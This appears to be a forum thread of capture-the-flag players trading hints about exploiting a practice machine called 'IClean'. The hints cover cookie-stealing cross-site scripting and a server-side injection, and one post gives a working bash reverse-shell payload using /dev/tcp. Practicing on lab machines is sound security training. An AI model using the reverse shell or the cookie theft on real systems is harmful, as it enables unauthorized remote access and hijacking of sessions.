Can anyone give me a hint for what to do on the invoice bit? preferably a more vague one because I’m gonna be mad at myself later if it ends up being something dumb
hello, I’m trying to enumerate the application and so far the only thing I found is the SendMessage endpoint, any advice on further enumeration?
No just reload the page not by “Ctrl+R” or the button enter on the url, or use burp it is normal there.
What is the /SendMessage endpoint doin? sending ur request to the management team right… so what attack do u think you can implement
the user is also serverside attack too
xss can be done with out <script>
it must be a client side attack since what you insert can be viewed by the management team. Nudge: x** but use some more advanced techniques than usual
am not saying the dashboard part am saying the foothold, it is server side attack S***.
oh my bad sorry, yep it is
1 Like
while to trying o escalate to root i found the root flag itself not sure if it was intentional or its and issue with the machine.
Come on man… I just stumbled with this same problem, fml… 
I was playing with half box because the website doesn’t work if not full-screened…
Just Pwned IClean! What a machine! Huge thanks to the community that helped me with the initial foothold. Definitely need to study more about web hacking! 
Hi everyone.
I tried to get a foothold for a long time
Tried a lot of attacks, also from the posts above
But no success. I cannot receive my responses in the intended way
I meant something is not triggering my injections
I believe its the machine. I haven’t tried to reload it.
Probably will get back to iClean some time later. That problem burned me out for 2 days straight
There is no need to reset because that is not the injection point. The last part of the generation (the details) is.
Guys, I have successfully stolen certain food, and got initial foothold. However, after sleep, this certain food got stale and repeating the same procedure does not yield any results. Resetting the machine does not help, seems like nobody reaches for the jar on the backend.
Anyone with the same problem?
I have got a shell but it terminated after first command !
my payload file has this/
bash -i >& /dev/tcp/[your ip]/[the port that you listening to] 0>&1
Late to the party but rooted! Nice Linux box thats not TOO tough. I needed some help with the first step but everything else was pretty straight forward. Just gotta enumerate and google.
Some really good hints on here as well.
Hint for root: once you find the thing, read all the documentation there is for it. Think about what it does, and what different ways of doing it there might be.
Something weired is going on with the XSS, can’t fetch the cookie